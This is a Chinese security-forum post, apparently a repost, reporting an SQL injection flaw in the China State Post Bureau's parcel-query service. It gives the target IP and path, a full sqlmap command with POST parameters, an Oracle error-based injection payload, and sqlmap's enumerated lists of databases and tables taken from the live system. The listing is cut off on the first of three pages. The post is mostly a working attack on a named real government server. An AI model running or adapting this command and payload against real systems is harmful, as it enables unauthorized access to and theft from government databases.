国家邮政局SQL注入漏洞下载

来源:黑吧安全网 浏览:1529次 时间:2014-04-28
做网站找雨过天晴工作室

国家邮政局SQL注射中华人民共和国国家邮政局 SQL注入 SQLMAP 验证

http://www.spb.gov.cn/folder9/folder2047/index.html

包裹查询功能

然后SQLMAP试着跑表

 

C:\Users\Administrator>sqlmap.py -u "219.141.228.193:8080/express/maincheck_pk.jsp" --data="radiobutton=2&addr1=a&addr2=d&kg=10&SS1=%B2%E9%D1%AF%D7%CA%B7%D1" --tables



sqlmap identified the following injection points with a total of 46 HTTP(s) requests:

---

Place: POST

Parameter: addr1

Type: error-based

Title: Oracle OR error-based - WHERE or HAVING clause (XMLType)

Payload: radiobutton=2&addr1=-8379') OR 8359=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(105)||CHR(97)||CHR(113)||(SELECT (CASE WHEN (8359=8359) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(116)||CHR(103)||CHR(113)||CHR(62))) FROM DUAL) AND ('TFti'='TFti&addr2=d&kg=10&SS1=%B2%E9%D1%AF%D7%CA%B7%D1

---

web application technology: JSP

back-end DBMS: Oracle

Database: EXFSYS

[1 table]

+--------------------------------+

| RLM$PARSEDCOND |

+--------------------------------+



Database: OLAPSYS

[9 tables]

+--------------------------------+

| CWM2$AWCUBECREATEACCESS |

| CWM2$AWDIMCREATEACCESS |

| CWM2$_AW_NEXT_TEMP_CUST_MEAS |

| CWM2$_AW_TEMP_CUST_MEAS_MAP |

| CWM2$_TEMP_VALUES |

| OLAP_SESSION_CUBES |

| OLAP_SESSION_DIMS |

| XML_LOAD_LOG |

| XML_LOAD_RECORDS |

+--------------------------------+



Database: EXPRESS

[38 tables]

+--------------------------------+

| F_AREAMEM_IN |

| F_AREAMEM_IN_HIS |

| F_AREAMEM_IN_TEM |

| F_AREAMEM_OUT |

| F_AREAMEM_OUT_HIS |

| F_AREAMEM_OUT_TEM |

| F_AREAMEM_OUT__ |

| F_AREA_IN |

| F_AREA_IN_HIS |

| F_AREA_IN_TEM |

| F_AREA_OUT |

| F_AREA_OUT_HIS |

| F_AREA_OUT_TEM |

| F_ARRAY |

| F_ARRAY_HIS |

| F_ARRAY_TEM |

| F_CPY |

| F_PROD |

| LOG_EXPRESS |

| LOG_EXPRESS_STAT |

| LOG_PACKAGE |

| LOG_PACKAGE_STAT |

| LOG_SYS_OPT |

| PBCATCOL |

| PBCATEDT |

| PBCATFMT |

| PBCATTBL |

| PBCATVLD |

| PC2DIST |

| PK_AREAMEM |

| PK_AREAS |

| PK_ARRAY |

| S_CITY |

| S_DIST |

| S_FIELDVALUE |

| S_PROV |

| S_QUERY_TYPE |

| TEST |

+--------------------------------+



Database: SYSTEM

[8 tables]

+--------------------------------+

| DEF$_TEMP$LOB |

| HELP |

| MVIEW$_ADV_INDEX |

| MVIEW$_ADV_OWB |

| MVIEW$_ADV_PARTITION |

| OL$ |

| OL$HINTS |

| OL$NODES |

+--------------------------------+



Database: SYS

[30 tables]

+--------------------------------+

| DUAL |

| AUDIT_ACTIONS |

| AW$AWCREATE |

| AW$AWCREATE10G |

| AW$AWMD |

| AW$AWREPORT |

| AW$AWXML |

| AW$EXPRESS |

| IMPDP_STATS |

| KU$NOEXP_TAB |

| ODCI_SECOBJ$ |

| ODCI_WARNINGS$ |

| OLAPI_HISTORY |

| OLAPI_IFACE_OBJECT_HISTORY |

| OLAPI_IFACE_OP_HISTORY |

| OLAPI_MEMORY_HEAP_HISTORY |

| OLAPI_MEMORY_OP_HISTORY |

| OLAPI_SESSION_HISTORY |

| OLAPTABLEVELS |

| OLAPTABLEVELTUPLES |

| OLAP_OLEDB_FUNCTIONS_PVT |

| OLAP_OLEDB_KEYWORDS |

| OLAP_OLEDB_MDPROPS |

| OLAP_OLEDB_MDPROPVALS |

| PLAN_TABLE$ |

| PSTUBTBL |

| STMT_AUDIT_OPTION_MAP |

| SYSTEM_PRIVILEGE_MAP |

| TABLE_PRIVILEGE_MAP |

| WRI$_ADV_ASA_RECO_DATA |

+--------------------------------+



Database: MDSYS

[36 tables]

+--------------------------------+

| OGIS_GEOMETRY_COLUMNS |

| OGIS_SPATIAL_REFERENCE_SYSTEMS |

| SDO_COORD_AXES |

| SDO_COORD_AXIS_NAMES |

| SDO_COORD_OPS |

| SDO_COORD_OP_METHODS |

| SDO_COORD_OP_PARAMS |

| SDO_COORD_OP_PARAM_USE |

| SDO_COORD_OP_PARAM_VALS |

[1] [2] [3]  下一页